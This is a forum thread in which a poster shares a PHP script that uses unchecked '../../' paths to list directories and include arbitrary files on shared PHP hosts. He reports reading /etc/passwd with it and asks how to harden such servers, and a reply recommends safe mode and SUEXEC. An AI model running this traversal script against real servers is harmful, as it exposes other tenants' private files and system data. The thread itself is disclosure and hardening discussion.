Safe mode or die?

tha_mink

I write and maintain lots of sites on shared servers around the net. I found most of these servers that run php do so in a pretty unsafe mode. I was reading this story when it occoured to me to try the malicious code on some of the sites I maintain. So I fooled with the code a little and tried posting this php code to some of the servers I use.

switch ($action) {
case "showit" :
  error_reporting(0);
  $location = "../../$folder";	// Move up one directory
	print"<p>Location is $location</p>";

  $parent  = dir($location);
	if (!$parent) {print'<p>Here is file</p>'; include("$location"); break;}
  print'<H1>Security Hole</h1>';
	print"<p>Here are the contents of the $location</p>";	
  // List the contents of the current directory
  // i.e.: /usr/local/websites
  while($entry =  $parent->read()) {

print"<p><a href=\"showme.php?action=showit&folder=$folder/$entry\">$entry</a></p>";
  }

break;

default:
  $location = "../../$folder";	// Move up one directory
  $parent = dir($location);
  print'<H1>Security Hole</h1>';
	print'<p>Here is some stuff that you probably should not be privilaged to see..</p>';	
  // List the contents of the current directory
  // i.e.: /usr/local/websites
  while($entry = $parent->read()) {
    print"<p><a href=\"showme.php?action=showit&folder=$entry\">$entry</a></p>";
  }
break;
}

Well what do you know...it worked on every server I tried it on and I was able to see lots of stuff I should not have been able to see. (including the ever popular /etc/passwd file)

So...I felt it my duty to inform the sysadmins of this problem due to the huge privacy violations it presented. They didn't like me for a few days.

The obvious answer is in th php.ini, more specifically safe mode was off and there was no doc_root or usr_root set. But since the whole thing was on a shared server most of the sysadmins were unwilling to fix the hole and chose to let the hole be as (they claim) it would break lots of code on their clients' sites. (my sites have since moved to a better situation but still....)

So the question is....on a shared server where you cannot set safe_mode on with one valid doc_root or usr_root...how can you tighten this hole up?

(PS...if you have anything on shared servers where some guy might let form data get by without checking it first...you may want to run this script just to see how private your files are)

Love,
tha_mink

Sxooter

Yep. Safe mode should be standard on any shared server.

That said, the real issue is that the apache server should be running SUEXEC mode. This would force all php scripts to execute as the own of the directory where they live, which would go a long way towards limiting the kind of damage you could do. I.e. you could set your directory to 600 and then serve it ONLY through your PHP scripts and no one could look at it, even if PHP wasn't running in safe mode.

SUEXEC is nice because it's fairly cheap in terms of CPU usage, and fairly well tested (it's been around a long time.)